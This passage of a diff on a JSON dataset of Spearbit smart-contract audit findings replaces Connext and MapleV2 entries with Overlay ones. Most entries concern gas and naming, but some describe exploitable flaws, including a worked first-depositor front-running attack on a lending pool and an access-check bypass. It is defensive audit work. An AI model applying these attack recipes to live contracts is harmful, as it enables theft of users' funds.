"https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The calculation in _midFromFeed() is more complicated than necessary because: min(x,y) + max(x,y) == x + y. More importantly, the average operation (bid + ask) / 2 can overflow and revert if bid + ask >= 2**256. function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) { uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow); uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow); mid_ = (bid + ask) / 2; }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "Event not emitted when ERC20 and native asset is transferred together to SponsorVault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Any ERC20 token or native asset can be transferred to SponsorVault contract by calling the de- posit() function. It emits a Deposit() event logging the transferred asset and the amount. However, if the native asset and an ERC20 token are transferred in the same call only a single event corresponding to the ERC20 transfer is emitted.", + "title": "Use implicit truncation of timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Solidity will truncate data when it is typecast to a smaller data type, see solidity explicit-conversions. This can be used to simplify the following statement: uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "payable keyword can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "If a function does not need to have the native asset sent to it it is recommended to not mark it as payable and avoid any funds getting. StableSwapFacet.sol has two payable functions: swapExact() and swapExactOut, which only swap ERC20 tokens and are not expected to receive the native asset.", + "title": "Set pos.entryPrice to 0 after liquidation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The liquidate() function sets most of the values of pos to 0, with the exception of pos.entryPrice. function liquidate(address owner, uint256 positionId) external { ... // store the updated position info data. mark as liquidated pos.notional = 0; pos.debt = 0; pos.oiShares = 0; pos.liquidated = true; positions.set(owner, positionId, pos); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Improve variable naming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Two different variables/functions with an almost identical name are prone to error. Variable names like _routerOwnershipRenounced and _assetOwnershipRenounced do not correctly reflect their meaning as they actually refer to the ownership whitelist being renounced. 45 function _isRouterOwnershipRenounced() internal view returns (bool) { return LibDiamond.contractOwner() == address(0) || s._routerOwnershipRenounced; } /** * @notice Indicates if the ownership of the asset whitelist has * been renounced */ function _isAssetOwnershipRenounced() internal view returns (bool) { ... bool _routerOwnershipRenounced; ... // 27 bool _assetOwnershipRenounced; The constant EMPTY is defined twice with different values. This is confusing and could lead to errors. contract BaseConnextFacet { ... bytes32 internal constant EMPTY = hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\"; ... ,! } library LibCrossDomainProperty { ... bytes29 public constant EMPTY = hex\"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"; ... } The function xcall() uses both _args.transactingAssetId and transactingAssetId. two, but they each have a very specific meaning and missing it introduces problems. It is easy to mix these function xcall(...) ... { ... address transactingAssetId = _args.transactingAssetId == address(0) ? address(s.wrapper) : _args.transactingAssetId; ... (, uint256 amount) = AssetLogic.handleIncomingAsset( _args.transactingAssetId, ... ); ... (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( ..., transactingAssetId, ... ); ... } In the _handleExecuteTransaction function of BridgeFacet, _args.amount and _amount are used. In this func- tion: _args.amount is equal to bridged_amount; 46 _amount is equal to bridged_amount - liquidityFee (and potentially swapped amount).", + "title": "Store result of expression in temporary variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Several gas optimizations are possible by storing the result of an expression in a temporary variable, such as the value of oiFromNotional(data, capNotionalAdjusted). 10 function build( ... ) { ... uint256 price = isLong ? ask(data, _registerVolumeAsk(data, oi, oiFromNotional(data, capNotionalAdjusted))) : bid(data, _registerVolumeBid(data, oi, oiFromNotional(data, capNotionalAdjusted))); ... require(oiTotalOnSide <= oiFromNotional(data, capNotionalAdjusted), \"OVLV1:oi>cap\"); } A: The value of pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) could be stored in a temporary variable to save gas. B: The value of oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) could also be stored in a temporary variable to save gas and make the code more readable. C: The value of pos.oiSharesCurrent(fraction) could be stored in a temporary variable to save gas. function unwind(...) ... { ... uint256 price = pos.isLong ? bid( data, _registerVolumeBid( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A1 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B1 ) ) : ask( data, _registerVolumeAsk( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A2 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B2 ) ); ... if (pos.isLong) { oiLong -= Math.min( oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A3 ); oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); // C1 } else { oiShort -= Math.min( oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A4 ); oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); // C2 } ... pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); // C3 } The value of 2 * k * timeElapsed could also be stored in a temporary variable: 11 function oiAfterFunding( ...) ... { ... if (2 * k * timeElapsed < MAX_NATURAL_EXPONENT) { fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "onlyRemoteRouter can be circumvented", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "BaseConnextFacet-fix. However, the change has not been applied to Router.sol#L56-L58 which is currently in use. The modifier onlyRemoteRouter() can be mislead if the sender parameter has the value 0. The modifier uses _m.sender() from the received message by Nomad. Assuming all checks of Nomad work as expected this value cannot be 0 as it originates from a msg.sender in Home.sol. contract Replica is Version0, NomadBase { function process(bytes memory _message) public returns (bool _success) { ... bytes29 _m = _message.ref(0); ... // ensure message has been proven bytes32 _messageHash = _m.keccak(); require(acceptableRoot(messages[_messageHash]), \"!proven\"); ... IMessageRecipient(_m.recipientAddress()).handle( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ); ... } } contract BridgeRouter is Version0, Router { function handle(uint32 _origin,uint32 _nonce,bytes32 _sender,bytes memory _message) external override onlyReplica onlyRemoteRouter(_origin, _sender) { ... } } abstract contract Router is XAppConnectionClient, IMessageRecipient { ... modifier onlyRemoteRouter(uint32 _origin, bytes32 _router) { require(_isRemoteRouter(_origin, _router), \"!remote router\"); _; } function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return remotes[_domain] == _router; // if _router == 0 then this is true for random _domains } }", + "title": "Flatten code of OverlayV1UniswapV3Feed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Functions _fetch(), _inputsToConsultMarketPool(), _inputsToConsultOvlWethPool() and con- sult() do a lot of interactions with small arrays and loops over them, increasing overhead and reading difficulty.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Some dust not accounted for in reconcile()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _handleExecuteLiquidity() in BridgeFacet takes care of rounding issues in toSwap / pathLen. However, the inverse function reconcile() in NomadFacet() does not do that. So, tiny amounts of tokens (dust) are not accounted for in reconcile(). contract BridgeFacet is BaseConnextFacet { ... function _handleExecuteLiquidity(...) ... { ... // For each router, assert they are approved, and deduct liquidity. uint256 routerAmount = toSwap / pathLen; for (uint256 i; i < pathLen - 1; ) { s.routerBalances[_args.routers[i]][_args.local] -= routerAmount; unchecked { ++i; } } // The last router in the multipath will sweep the remaining balance to account for remainder ,! dust. uint256 toSweep = routerAmount + (toSwap % pathLen); s.routerBalances[_args.routers[pathLen - 1]][_args.local] -= toSweep; } } } contract NomadFacet is BaseConnextFacet { ... function reconcile(...) ... { ... uint256 routerAmt = toDistribute / pathLen; for (uint256 i; i < pathLen; ) { s.routerBalances[routers[i]][localToken] += routerAmt; unchecked { ++i; } } } }", + "title": "Replace memory with calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "External calls to functions with memory parameters can be made more gas efficient by replacing memory with calldata, as long as the memory parameters are not modified.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Careful with the decimals of BridgeTokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The BridgeRouter sends token details including the decimals() over the nomad bridge to configure a new deployed token. After setting the hash with setDetailsHash() anyone can call setDetails() on the token to set the details. The decimals() are mainly used for user interfaces so it might not be a large problem when the setDetails() is executed at later point in time. However initializeSwap() also uses decimals(), this is called via offchain code. In the example code of initializeSwap.ts it retrieves the decimals() from the deployed token on the destination chain. This introduces a race condition between setDetails() and initializeSwap.ts, depending on which is executed first, the swaps will have different results. Note: It could also break the ConnextPriceOracle contract BridgeRouter is Version0, Router { ... function _send( ... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... // query token contract for details and calculate detailsHash _detailsHash = BridgeMessage.getDetailsHash(_t.name(), _t.symbol(), _t.decimals()); } else { ... } } function _handleTransfer(...) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... } else { ... IBridgeToken(_token).setDetailsHash(_action.detailsHash()); // so hash is set now } } } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function setDetails(..., uint8 _newDecimals) ... { // can be called by anyone ... require( _isFirstDetails || BridgeMessage.getDetailsHash(..., _newDecimals) == detailsHash, \"!committed details\" ); ... token.decimals = _newDecimals; ... } } Example script: initializeSwap.ts 49 const decimals = await Promise.all([ (await ethers.getContractAt(\"TestERC20\", local)).decimals(), (await ethers.getContractAt(\"TestERC20\", adopted)).decimals(), // setDetails might not have ,! been done ]); const tx = await connext.initializeSwap(..., decimals, ... ); ); contract SwapAdminFacet is BaseConnextFacet { ... function initializeSwap(..., uint8[] memory decimals, ... ) ... { ... for (uint8 i; i < numPooledTokens; ) { ... precisionMultipliers[i] = 10**uint256(SwapUtils.POOL_PRECISION_DECIMALS - decimals[i]); ... } } }", + "title": "No need to cache immutable values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Variables microWindow and macroWindow are immutable, so it is not necessary to cache them because the compiler inlines their value. contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { function _fetch() internal view virtual override returns (Oracle.Data memory) { // cache micro and macro windows for gas savings uint256 _microWindow = microWindow; uint256 _macroWindow = macroWindow; ... } } abstract contract OverlayV1Feed is IOverlayV1Feed { ... uint256 public immutable microWindow; uint256 public immutable macroWindow; ... constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; } }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect comment about ERC20 approval to zero-address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The linked code notes in a comment: // NOTE: if pool is not registered here, then the approval will fail // as it will approve to the zero-address SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); This is not always true. The ERC20 spec doesnt have this restriction and ERC20 tokens based on solmate also dont revert on approving to zero-address. There is no risk here as the following line of code for zero-address pools will revert. return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut);", + "title": "Simplify circuitBreaker", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function circuitBreaker() does a divDown() which can be circumvented to save gas and improving readability. function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) { return 0; } ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Native asset is delivered even if the wrapped asset is transferred", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Connext delivers the native asset on the destination chain even if the wrapped asset was transferred. This is because on the source chain the native asset is converted to the wrapped asset, and then the distinction is lost. On the destination chain it is not possible to know which of these two assets was transferred, and hence a choice is made to transfer the native asset. if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ...", + "title": "Optimizations if data.macroWindow is constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Several checks are done in contract OverlayV1Market which involve data.macroWindow in combi- nation with a linear calculation. If data.macroWindow does not change (as is the case with the UniswapV3 feed), it is possible to optimize the calculations by precalculating several values.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Entire transfer amount is borrowed from AAVE Portal when a router has insufficient balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "If the router picked by the Sequencer doesnt have enough balance to transfer the required amount, it can borrow the entire amount from Aave Portal. For a huge amount, it will block borrowing for other routers since there is a limit on the total maximum amount that can be borrowed.", + "title": "Remove unused / redundant functions and variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Functions nextPositionId() and mid() in OverlayV1Market.sol are not used internally and dont appear to be useful. contract OverlayV1Market is IOverlayV1Market { function nextPositionId() external view returns (uint256) { return _totalPositions; } function mid(Oracle.Data memory data,uint256 volumeBid,uint256 volumeAsk) ... { ... } } The functions oiInitial() and oiSharesCurrent() in library Position.sol have the same implementation. The oiInitial() function does not seem useful as it retrieves current positions and not initial ones. library Position { /// @notice Computes the initial open interest of position when built ... function oiInitial(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } /// @notice Computes the current shares of open interest position holds ... function oiSharesCurrent(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } } 15 The function liquidationPrice() in library Position.sol is not used from the contracts. Because it type is internal it cannot be called from the outside either. library Position { function liquidationPrice(... ) internal pure returns (uint256 liqPrice_) { ... } } The variables ovlWethToken0 and ovlWethToken1 are stored but not used anymore. constructor(..., address _ovlWethPool,...) .. { ... // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); ... ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization OverlayV1Market.sol#L536-L539," ] }, { - "title": "Unused variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The variable message is not used after declaration. bytes memory message;", + "title": "Optimize power functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "In contract OverlayV1Market.sol, several power calculations are done with EULER / INVERSE_EULER as a base which can be optimized to save gas. function dataIsValid(Oracle.Data memory data) public view returns (bool) { ... uint256 dpLowerLimit = INVERSE_EULER.powUp(pow); uint256 dpUpperLimit = EULER.powUp(pow); ... } Note: As the Overlay team confirmed, less precision might be sufficient for this calculation. OverlayV1Market.sol: fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); OverlayV1Market.sol: bid_ = bid_.mulDown(INVERSE_EULER.powUp(pow)); OverlayV1Market.sol: ask_ = ask_.mulUp(EULER.powUp(pow)); 16", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect Natspec for adopted and canonical asset mappings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "adoptedToCanonical maps adopted assets to canonical assets, but is described as a \"Mapping of canonical to adopted assets\"; canonicalToAdopted maps canonical assets to adopted assets, but is described as a \"Mapping of adopted to canonical assets\". // /** // * @notice Mapping of canonical to adopted assets on this domain // * @dev If the adopted asset is the native asset, the keyed address will // * be the wrapped asset address // */ // 12 mapping(address => TokenId) adoptedToCanonical; // /** // * @notice Mapping of adopted to canonical on this domain // * @dev If the adopted asset is the native asset, the stored address will be the // * wrapped asset address // */ // 13 mapping(bytes32 => address) canonicalToAdopted;", + "title": "Redundant Math.min()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function capNotionalAdjustedForCircuitBreaker() calculates circuitBreaker() and then does a Math.min(cap,...) with the result. However circuitBreaker() already returns a value that is <= cap. So the Math.min(...) function is unnecesary. 17 function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) { ... cap = Math.min(cap, circuitBreaker(snapshot, cap)); return cap; } function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) public view returns (uint256) { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (...) { return 0; } // so minted > _circuitBreakerMintTarget, thus minted / _circuitBreakerMintTarget > ONE ... uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget); // so adjustment <= ONE return cap.mulDown(adjustment); // so this is <= cap }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Use of SafeMath for solc >= 0.8", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "AmplificationUtils, SwapUtils, ConnextPriceOracle, GovernanceRouter.sol use SafeMath. Since 0.8.0, arithmetic in solidity reverts if it overflows or underflows, hence there is no need to use open- zeppelins SafeMath library.", + "title": "Replace square with multiplication", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The contract OverlayV1Market.sol contains the following expression several times: x.powDown(2 * ONE). This computes the square of x. However, it can also be calculated in a more gas efficient way: function oiAfterFunding(...) { ... uint256 underRoot = ONE - oiImbalanceBefore.divDown(oiTotalBefore).powDown(2 * ONE).mulDown( ONE - fundingFactor.powDown(2 * ONE) ); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "First pool depositor can be front-run and have part of their deposit stolen", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The first deposit with a totalSupply of zero shares will mint shares equal to the deposited amount. This makes it possible to deposit the smallest unit of a token and profit off a rounding issue in the computation for the minted shares of the next depositor: (shares_ * totalAssets()) / totalSupply_ Example: The first depositor (victim) wants to deposit 2M USDC (2e12) and submits the transaction. The attacker front runs the victim's transaction by calling deposit(1) to get 1 share. They then transfer 1M USDC (1e12) to the contract, such that totalAssets = 1e12 + 1, totalSupply = 1. When the victim's transaction is mined, they receive 2e12 / (1e12 + 1) * totalSupply = 1 shares (rounded down from 1.9999...). The attacker withdraws their 1 share and gets 3M USDC * 1 / 2 = 1.5M USDC, making a 0.5M profit. During the migration, an _initialSupply of shares to be airdropped are already minted at initialization and are not affected by this attack.", + "title": "Retrieve roles via constants in import", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Within contract OverlayV1Factory.sol, the roles GOVERNOR_ROLE, MINTER_ROLE, BURNER_ROLE are retrieved via an external function call. To save gas they could also be retrieved as constants via import. Additionally, a role ADMIN_ROLE is defined in contract OverlayV1Token.sol, which is the same as DEFAULT_ADMIN_- ROLE of AccessControl.sol. This ADMIN_ROLE could be replaced with DEFAULT_ADMIN_ROLE. modifier onlyGovernor() { - + require(ovl.hasRole(ovl.GOVERNOR_ROLE(), msg.sender), \"OVLV1: !governor\"); require(ovl.hasRole(GOVERNOR_ROLE, msg.sender), \"OVLV1: !governor\"); _; } ... function deployMarket(...) { ... ovl.grantRole(ovl.MINTER_ROLE(), market_); ovl.grantRole(MINTER_ROLE, market_); ovl.grantRole(ovl.BURNER_ROLE(), market_); ovl.grantRole(BURNER_ROLE, market_); ... - + - + }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: High Risk" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Users depositing to a pool with unrealized losses will take on the losses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The pool share price used for deposits is always the totalAssets() / totalSupply, however the pool share price when redeeming is totalAssets() - unrealizedLosses() / totalSupply. The unrealized- Losses value is increased by loan impairments (LM.impairLoan) or when starting triggering a default with a liq- uidation (LM.triggerDefault). The totalAssets are only reduced by this value when the loss is realized in LM.removeLoanImpairment or LM.finishCollateralLiquidation. This leads to a time window where deposits use a much higher share price than current redemptions and future deposits. Users depositing to the pool during this time window are almost guaranteed to make losses when they In the worst case, a Pool.deposit might even be (accidentally) front-run by a loan impairment or are realized. liquidation.", + "title": "Double check action when snapAccumulator == 0 in transform()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function transform() does a check for snapAccumulator + value == 0 (where all variables are of type int256). This could be true if value == -snapAccumulator (or snapAccumulator == value == 0) A comment shows this is to prevent division by 0 later on. The division is based on abs(snapAccumulator) + abs(value). So this will only fail when snapAccumulator == value == 0. function transform(...) ... { ... int256 accumulatorNow = snapAccumulator + value; if (accumulatorNow == 0) { // if accumulator now is zero, windowNow is simply window // to avoid 0/0 case below return ... ---> this comment might not be accurate } ... uint256 w1 = uint256(snapAccumulator >= 0 ? snapAccumulator : -snapAccumulator); // w1 = abs(snapAccumulator) uint256 w2 = uint256(value >= 0 ? value : -value); uint256 windowNow = (w1 * (snapWindow - dt) + w2 * window) / (w1 + w2); // only fails if w1 == w2 == 0 ... // w2 = abs(value) ,! ,! }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "TransitionLoanManager.add does not account for accrued interest since last call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The TransitionLoanManager.add advances the domain start but the accrued interest since the last domain start is not accounted for. If add is called several times, the accounting will be wrong. It therefore wrongly tracks the _accountedInterest variable.", + "title": "Add unchecked in natural log (ln) function or remove the functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function ln() in contract LogExpMath.sol does not use unchecked, while the function log() does. Note: Neither ln() nor log() are used, so they could also be deleted. function log(int256 arg, int256 base) internal pure returns (int256) { unchecked { ... } } function ln(int256 a) internal pure returns (int256) { // no unchecked }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Unaccounted collateral is mishandled in triggerDefault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The control flow of triggerDefault is partially determined by the value of MapleLoanLike(loan_- ).collateral() == 0. The code later assumes there are 0 collateral tokens in the loan if this value is true, which is incorrect in the case of unaccounted collateral tokens. In non-liquidating repossessions, this causes an overes- timation of the number of fundsAsset tokens repossessed, leading to a revert in the _disburseLiquidationFunds function. Anyone can trigger this revert by manually transferring 1 Wei of collateralAsset to the loan itself. In liq- uidating repossessions, a similar issue causes the code to call the liquidator's setCollateralRemaining function with only accounted collateral, meaning unaccounted collateral will be unused/stuck in the liquidator.", + "title": "Specialized functions for the long and short side", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The functions build(), unwind() and liquidate() contain a large percentage of code that is differ- ent for the long and short side.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Initial cycle time is wrong when queuing several config updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The initial cycle time will be wrong if there's already an upcoming config change that changes the cycle duration. Example: currentCycleId: 100 config[0] = currentConfig = {initialCycleId: 1, cycleDuration = 1 days} config[1] = {initialCycleId: 101, cycleDuration = 7 days} Now, scheduling will create a config with initialCycleId: 103 and initialCycleTime = now + 3 * 1 days, but the cycle durations for cycles (100, 101, 102) are 1 days + 7 days + 7 days.", + "title": "Beware of chain dependencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The contracts have a few dependencies/assumptions which arent future proof and/or limit on which chain the code can be deployed. The AVERAGE_BLOCK_TIME is different on several EVM based chains. As the the Ethereum mainchain, the AVER- AGE_BLOCK_TIME will change to 12 seconds after the merge. contract OverlayV1Market is IOverlayV1Market { ... uint256 internal constant AVERAGE_BLOCK_TIME = 14; // (BAD) TODO: remove since not futureproof ... } WETH addresses are not the same on different chains. See Uniswap Wrapped Native Token Addresses. Note: Several chains have a different native token instead of ETH. 21 contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { address public constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; ... }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Users cannot resubmit a withdrawal request as per the wiki", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "As per Maple's wiki: pool-v2::PoolManager.sol#371-L382, withdrawal- Refresh: The withdrawal request can be resubmitted with the same amount of shares by calling pool.requestRedeem(0). However, the current implementation prevents Pool.requestRedeem() from being called where the shares_ pa- rameter is zero.", + "title": "Move _registerMint() closer to mint() and burn()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Within functions unwind() and liquidate() there is a call to _registerMint() as well as calls to ovl.mint() and ovl.burn(). However these two are quite a few lines apart so it is not immediately obvious they are related and operate on the same values. Additionally _registerMint() also registers burns. function unwind(...) ... { ... _registerMint(int256(value) - int256(cost)); ... // 40 lines of code if (value >= cost) { ovl.mint(address(this), value - cost); } else { ovl.burn(cost - value); } ... } function liquidate(address owner, uint256 positionId) external { ... _registerMint(int256(value) - int256(cost)); ... // 33 lines of code ovl.burn(cost - value); ... }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Accrued interest may be calculated on an overstated payment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The checkTotalAssets() function is a useful helper that may be used to make business decisions in the protocol. However, if there is a late loan payment, the total interest is calculated on an incorrect payment interval, causing the accrued interest to be overstated. It is also important to note that late interest will also be excluded from the total interest calculation.", + "title": "Use of Math.min() is error-prone", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Function Math.min() is used in two ways: To get the smallest of two values, e.g. x = Math.min(x,y); To make sure the resulting value is >=0, e.g. x -= Math.min(x,y); (note, there is an extra - in -= ) It is easy to make a mistake because both constructs are rather similar. Note: No mistakes have been found in the code. Examples to get the smallest of two values: OverlayV1Market.sol: tradingFee OverlayV1Market.sol: cap OverlayV1Market.sol: cap = Math.min(tradingFee, value); = Math.min(cap, circuitBreaker(snapshot, cap)); = Math.min(cap, backRunBound(data)); Examples to make sure the resulting value is >=0: OverlayV1Market.sol: oiLong -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares OverlayV1Market.sol: pos.notional OverlayV1Market.sol: pos.debt OverlayV1Market.sol: pos.oiShares OverlayV1Market.sol: oiLong oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares Position.sol: posCost -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= uint120( Math.min(pos.notional, pos.notionalInitial(fraction))); -= uint120( Math.min(pos.debt, pos.debtCurrent(fraction))); -= 